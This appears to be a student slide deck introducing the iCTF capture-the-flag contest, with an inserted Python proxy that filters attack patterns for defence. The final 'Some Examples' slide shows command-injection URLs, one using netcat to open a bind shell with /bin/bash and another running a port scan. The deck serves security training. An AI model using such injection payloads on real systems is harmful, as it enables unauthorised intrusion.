Post on 02-Jan-2016

CAPTURE THE FLAG

Introductions

beer brew man

dutchrowboat

Teams

• Firewall: IDS/IPS
• Services – Attack and Defense: PHP, Perl, Ruby, Python, Java; C/ASM
• Analysis: Wireshark, etc.
• Operating System: Apache, OS configuration, etc.

iCTF

• Came from Defcon
• iCTF run by UCSB
• No test required – just .edu
• “Largest existing live security exercise”
• Tests skills in understanding security

What is it?

A variety of Internet-enabled services, comprised of:

• PHP
• Perl
• Shell scripts
• C++
• MySQL
• Apache/lighttpd
• SSH
• XML RPC
• FTP

What to do

• All services should be protected: patch, IPS/IDS
• All services should be attacked

Blender

SNAT with weights?

Is it real?

Rules

• No DoS; all traffic is penalized
• Must stay on the internal network
• Don't prevent legitimate traffic
• Don't break rules: if attacking a service, don't launch a DoS from the compromised machine

2005 Defcon – hack the scorebot

Attack Techniques

• Buffer overflows
• Format string attacks
• Shell attacks
• Race conditions
• Misconfigurations
• Authentication attacks
• Web-based attacks
  – Directory traversal
  – Cookie-based services
  – Cross-site scripting
  – Server-side applications
• Lack of parameter validation (e.g., SQL injection)

Skills

• Scanning
• Firewalling
• Intrusion detection
• Vulnerability analysis
• For each type of vulnerability
  – How to identify a vulnerability
  – How to exploit a vulnerability
  – How to patch a vulnerability (without disrupting the get/set flag methods)
  – How to detect a vulnerability
• For each service
  – How to monitor the requests to a service
  – How to monitor the execution of a request
  – Protocol security analysis
  – Application security analysis

Vigna's Suggestions

• Have a structured team with clear responsibilities
  – The Perl/Python/PHP group
  – The SQL/database group
  – The flaw-finder group
  – The firewall group
  – The IDS group
  – The C-based exploit group
• Have a leader responsible for coordination and integration
• Have a way to intercept socket connections and apply regexes/substitutions
• Have vulnerability analysis tools handy
• Have a “human IDS”
• Remember: the game lasts only a few hours
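The "intercept socket connections and apply regexes/substitutions" suggestion and the "monitor the requests to a service" skill above, as an added example that is not part of the slides: a small asyncio TCP proxy placed in front of a team's service that logs requests matching the attack classes listed earlier, rewrites or drops them, and passes scorebot flag traffic through untouched. The rule patterns, the GETFLAG/SETFLAG prefix and the ports 8080/8081 are constructed assumptions, not the iCTF protocol.

```python
import asyncio
import re

# Constructed rules (not from the slides), one per attack class the deck lists; None = drop.
RULES = [
    ("directory traversal", re.compile(rb"(\.\./)+"), b""),
    ("format string", re.compile(rb"%\d*\$?n"), b"%%n"),
    ("shell metacharacters", re.compile(rb"[;`|]|\$\("), None),
]
# Assumed scorebot get/set-flag request prefix; real iCTF services differ.
FLAG_TRAFFIC = re.compile(rb"^(GET|SET)FLAG\b")

def filter_request(data):
    """Return (bytes to forward, or None if dropped; names of rules hit)."""
    alerts = []
    if FLAG_TRAFFIC.match(data):
        return data, alerts  # never disturb the get/set flag methods
    for name, pattern, replacement in RULES:
        if pattern.search(data):
            alerts.append(name)
            if replacement is None:
                return None, alerts
            data = pattern.sub(replacement, data)
    return data, alerts

async def pipe(reader, writer, inspect):
    try:
        while chunk := await reader.read(4096):
            chunk, alerts = filter_request(chunk) if inspect else (chunk, [])
            for name in alerts:  # alert feed for the "human IDS"
                print(f"[ALERT] {name}")
            if chunk is None:
                break  # a drop rule fired; closing the writer ends the session
            writer.write(chunk)
            await writer.drain()
    finally:
        writer.close()

async def handle(client_r, client_w, backend):
    svc_r, svc_w = await asyncio.open_connection(*backend)
    await asyncio.gather(pipe(client_r, svc_w, True),    # inspect client->service
                         pipe(svc_r, client_w, False))   # replies pass through

async def main(listen_port=8080, backend=("127.0.0.1", 8081)):  # assumed ports
    server = await asyncio.start_server(
        lambda r, w: handle(r, w, backend), "0.0.0.0", listen_port)
    async with server:
        await server.serve_forever()

if __name__ == "__main__":
    asyncio.run(main())
```

Run it beside the service, then repoint the firewall rule for that service's port at the proxy; each alert line is the cue for the human IDS to look at the request.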

Not the first time…

2009

Questions?

http://athena.uccs.edu/ictf

Backups…

Test Network / Real Network (network diagrams; only the node labels survive): Image (10.10.1.2), Vuln (10.10.1.3), Team (10.10.1.4), Hub, Team Box (10.10.1.1), Mon Box (10.10.1.x), Attack Boxes, Console for Fixes, Image Test Box, Vuln Patch Test, Vuln Attack Box, UCCS Boxes.

Some Examples

echo GET / | nc 10.110.134.123 80 > ./myoutput.txt

http://10.100.134.77/users/url3@l.php?command=nc -lp 1337 -e /bin/bash

http://10.100.134.77/users/url3@l.php?command=nmap -p 1-65535 10.120.134.222 > port.txt
